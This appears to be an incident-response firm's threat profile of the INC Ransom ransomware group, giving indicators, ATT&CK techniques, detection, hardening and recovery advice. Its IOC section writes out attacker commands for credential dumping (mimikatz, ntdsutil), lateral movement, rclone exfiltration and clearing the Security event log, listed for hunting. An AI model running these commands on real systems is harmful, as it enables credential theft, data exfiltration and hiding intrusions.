What is INC Ransom (Incransom) ransomware?

INC Ransom is a double-extortion ransomware group active since 2023. It targets organisations worldwide, encrypts data using the .INC extension and threatens to leak stolen information on a Tor leak site if the ransom is not paid.

What should I do if my organisation is hit by INC Ransom?

Immediately isolate affected systems from the network, preserve logs and forensic artefacts, and contact an experienced incident response team. Avoid deleting encrypted files, rebuilding systems before evidence is collected or negotiating with the attackers without expert support.

Double-extortion RaaS · Active since 2023 · Targeted attacks

INC Ransom (Incransom) – ransomware profile, indicators & response guidance

INC Ransom – also known as Incransom – is a double-extortion ransomware operation active since 2023. The group targets organisations worldwide, encrypts data with the .INC extension and threatens to publish stolen information on a Tor-based leak site if the ransom is not paid.

Call 24/7 hotline Request incident response support

10+ years experience with ransomware cases EU-based digital forensics & IR team INC Ransom, Akira, Qilin, LockBit & more

Immediate help • Confidential

You might be under active attack

INC Ransom intrusions typically involve data theft, domain-wide encryption and threats to publish stolen data on Tor. Speak directly to an incident responder – not a call centre.

+49 (7275) 9692381

or email dfir@mh-service.de
Subject: “INC Ransom incident”

✔ Initial technical triage within a short time frame
✔ Clear guidance on what to do in the next 1–4 hours
✔ Support with management, legal and regulatory communication

INC Ransom leak site on Tor listing victims — Example of an INC Ransom leak page (Tor hidden service, victim details anonymised).

Group profile & key facts

First observed: Mid-2023 (Windows & Linux campaigns)
Model: Ransomware-as-a-Service (RaaS), double extortion
Ransom note: INC-README.txt
File extension: Encrypted files typically end in .INC

Target profile

INC Ransom predominantly targets organisations rather than individual home users – including manufacturing, professional services, education, construction and healthcare. Victims are located worldwide, with a focus on Europe and North America.

Attack strategy

The group typically combines initial access via exposed services or edge devices (for example VPN gateways and firewalls) with credential theft, lateral movement to critical systems, data exfiltration and large-scale encryption – followed by extortion via a Tor-hosted leak site.

Business impact

Disruption often affects core business systems such as file servers, virtualisation platforms, ERP or email. In addition to encryption impact, regulatory exposure and reputational damage from data leaks can be significant – even if backups are available.

File indicators – extensions, notes & artefacts

File extensions & ransom notes

Encrypted files: often renamed with the .INC extension.
Ransom note: text file named INC-README.txt in directories with encrypted data.
Victim ID & contact: the note usually includes a victim-specific code and instructions to access a Tor-based chat portal.

Note: filenames, extensions and wording can change between campaigns. Treat these indicators as examples, not an exhaustive list.

Example artefacts for hunting

Newly created INC-README.txt files across file shares and workstation profiles.
Unusual spikes of file rename operations followed by rapid file size changes.
Presence of suspicious executables or scripts in temporary and profile directories.
Staged archives (e.g. .zip, .7z) in unusual locations prior to encryption.

Indicators of compromise (IOCs) & tools commonly observed

Public reporting and incident experience show that INC Ransom operators frequently rely on a set of standard administrative and offensive tools during intrusions. These tools are not malicious by themselves, but their combination and context can be highly suspicious.

Examples of commands & utilities seen in campaigns

# Discovery & situational awareness
ipconfig /all
systeminfo
netstat -ano
nltest /dclist:YOURDOMAIN
nltest /domain_trusts

# Credential access & privilege escalation
mimikatz.exe
ntdsutil "activate instance ntds" "ifm" "create full C:\temp\ntds" quit quit

# Lateral movement & remote execution
PsExec.exe \\HOST cmd.exe
wmic process call create …

# Data staging & exfiltration
rclone.exe copy C:\Shares remote:backup --config C:\temp\rclone.conf
restic backup C:\ImportantData --repo …

# Defence evasion & log tampering
wevtutil cl Security
taskkill /F /IM securitytool.exe

These examples are simplified and focus on detection and hunting. On their own, they do not prove an INC Ransom intrusion, but they should trigger closer investigation if seen together with other suspicious behaviour.

Network indicators, leak site & infrastructure

INC Ransom maintains a Tor-based leak site where they list victims who have not met their demands, as well as chat portals used during negotiations. These services are an important part of the double-extortion strategy.

Leak site: Tor hidden service URL dedicated to publishing stolen data and victim names.
Chat portal: separate Tor-hosted service for negotiation and “support”.
Data transfer: exfiltration often uses cloud storage tools or bespoke SFTP/RDP servers.

For operational security, we recommend monitoring outbound connections to unfamiliar cloud storage providers, VPS ranges and anonymisation infrastructure, rather than relying on static onion or IP indicators alone.

MITRE ATT&CK mapping – example techniques used by INC Ransom

The following mapping is a summarised view based on public threat intelligence and typical double-extortion playbooks. Individual incidents may deviate.

Initial Access: T1078 Valid Accounts (VPN, RDP), T1133 External Remote Services, exploitation of vulnerable edge devices.
Execution: T1059 Command and Scripting Interpreter (PowerShell, CMD, Bash).
Persistence: T1547 Boot or Logon Autostart Execution (services, run keys, scheduled tasks).
Privilege Escalation: T1068 Exploitation for Privilege Escalation.
Defense Evasion: T1562 Impair Defenses (AV/EDR tampering, log clearing), T1070 Indicator Removal.
Credential Access: T1003 OS Credential Dumping (NTDS, LSASS, SAM using tools such as Mimikatz).
Discovery: T1087 Account Discovery, T1018 Remote System Discovery, T1049 System Network Connections Discovery.
Lateral Movement: T1021 Remote Services (RDP, SMB, WinRM), T1021.002 SMB/Windows Admin Shares.
Collection: T1119 Automated Collection across file shares and application servers.
Exfiltration: T1041 Exfiltration Over C2 Channel (e.g. via cloud storage tools).
Impact: T1486 Data Encrypted for Impact, T1490 Inhibit System Recovery (shadow copy deletion, backup removal).

How to detect and reduce the risk of an INC Ransom intrusion

Detection & telemetry focus areas

Authentication anomalies: repeated failed logins, legacy VPN usage without MFA, logins from unusual locations or autonomous systems.
Endpoint behaviour: suspicious tools launched from temporary directories, encryption-like file access patterns, rapid service stoppage.
Backup infrastructure: unexpected deletion of snapshots, backup jobs disabled or modified by non-backup accounts.
Network traffic: new outbound connections to unknown cloud storage providers or VPS infrastructure, especially preceding encryption.

Hardening & basic protections

Enforce MFA on all external remote access (VPN, RDP gateways, cloud admin consoles).
Reduce and monitor publicly exposed services – especially legacy VPNs, RDP and web management interfaces.
Implement network segmentation for backups, domain controllers and critical OT/ICS systems.
Maintain tested offline or immutable backups and ensure restore procedures are documented and exercised.

Decryption & data recovery options for INC Ransom

Are INC Ransom encrypted files recoverable without paying?

At the time of writing, there is no publicly available universal decryptor for current INC Ransom variants. For some early or specific builds, security researchers and incident response teams have reported successful decryption in isolated cases – but these methods are not generally applicable to all victims.

In practice, recovery options typically focus on:

Restoring from clean, offline or immutable backups that were not compromised or encrypted.
Recovering from snapshots, replicas or archived copies in storage systems and cloud services.
Targeted file-level recovery where partial data remains intact or shadow copies survived.

            Important:
            
              Do not delete encrypted data. Even if immediate decryption is not possible, future tooling or keys might become
              available for specific variants. Preserving encrypted files, logs and forensic artefacts is essential for any
              later recovery attempt and legal or insurance processes.

Further threat intelligence & external analyses

For an up-to-date picture of INC Ransom activity, we recommend correlating multiple threat-intelligence sources (vendor blogs, CERT advisories, open-source feeds) with your own telemetry.

Threat-intel articles from security vendors describing INC Ransom TTPs and infrastructure.
Community and academic analyses of Windows and Linux INC payloads.
Government / CERT advisories where INC Ransom is mentioned as an active threat actor.

Our DFIR team continuously tracks changes in INC Ransom tooling, infrastructure and negotiation practices and incorporates those into hunting queries, detection content and hardening guidance.

Related ransomware groups

Many organisations facing INC Ransom also need to assess exposure to other active double-extortion operations. We provide dedicated briefings and response services for, among others: